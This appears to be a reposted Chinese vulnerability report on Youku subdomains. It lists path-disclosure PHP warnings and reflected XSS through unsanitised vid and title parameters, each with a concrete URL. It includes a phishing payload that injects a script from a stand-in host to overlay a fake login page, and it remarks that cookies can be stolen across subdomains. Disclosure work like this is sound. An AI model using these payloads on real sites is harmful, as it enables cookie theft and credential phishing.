来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 优酷两处配置不当导致路径泄漏和多处XSS(至少20处)XSS主要是由于vid参数未处理,有很多网页都用vid参数调用视频链接。别小看XSS配置不当:http://realplayer.youku.com/list.php?cls=104http://re...
|
优酷两处配置不当导致路径泄漏和多处XSS(至少20处)
XSS主要是由于vid参数未处理,有很多网页都用vid参数调用视频链接。 别小看XSS 配置不当: http://realplayer.youku.com/list.php?cls=104 http://realplayer.youku.com/detail.php?id=error Warning: Invalid argument supplied for foreach() in /real/WebSite/htdocs/guide.cn.real.com/newsite/youku/list.php on line 34 Warning: simplexml_load_file() [function.simplexml-load-file]: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /real/WebSite/htdocs/guide.cn.real.com/newsite/youku/list.php on line 59 ... Warning: simplexml_load_file() [function.simplexml-load-file]: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /real/WebSite/htdocs/guide.cn.real.com/newsite/youku/detail.php on line 12 Warning: simplexml_load_file(http://api.youku.com/api_ptvideoinfo?pid=XMTI3Ng==&id=error) [function.simplexml-load-file]: failed to open stream: Connection timed out in /real/WebSite/htdocs/guide.cn.real.com/newsite/youku/detail.php on line 12 XSS:都为vid参数或title参数存在XSS http://sww.youku.com/player.php?pv=&tag=whhgx&vid=XMTgwMzc5Njg4&title=%E4%BA%8E%E9%9B%AA%E8%96%87 http://minisite.youku.com/audi-ade/play.php?type=tt&vid=XMjgwMDk1MjEy ... 优酷的COOKIE的DOMAIN为.youku,com,因此可在分站直接获取主站的COOKIE,还可用于跳转与钓鱼 钓鱼: http://minisite.youku.com/audi-ade/play.php?type=tt&vid=XMjgwMDk1MjEy%3C/script%3E%3Cscript%20src=http://127.0.0.1/webpage.js%20type=text/javascript%3Ediaoyu();/* 由函数diaoyu()调取伪造的登录界面并覆盖整个原先的界面(CSS设置下就可以) 漏洞证明:http://realplayer.youku.com/list.php?cls=104#路径 http://realplayer.youku.com/detail.php?id=error#路径 http://sww.youku.com/player.php?pv=&tag=whhgx&vid=XMTgwMzc5Njg4&title=%E4%BA%8E%E9%9B%AA%E8%96%87#XSS http://minisite.youku.com/audi-ade/play.php?vid=XMjgwMDk1MjEy&type=tt#XSS Warning: Invalid argument supplied for foreach() in /real/WebSite/htdocs/guide.cn.real.com/newsite/youku/list.php on line 34 Warning: simplexml_load_file() [function.simplexml-load-file]: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /real/WebSite/htdocs/guide.cn.real.com/newsite/youku/list.php on line 59 ... Warning: simplexml_load_file() [function.simplexml-load-file]: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /real/WebSite/htdocs/guide.cn.real.com/newsite/youku/detail.php on line 12 Warning: simplexml_load_file(http://api.youku.com/api_ptvideoinfo?pid=XMTI3Ng==&id=error) [function.simplexml-load-file]: failed to open stream: Connection timed out in /real/WebSite/htdocs/guide.cn.real.com/newsite/youku/detail.php on line 12   钓鱼:  修复方案: 更改配置或代码,对相关参数进行处理 作者Ambulong |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
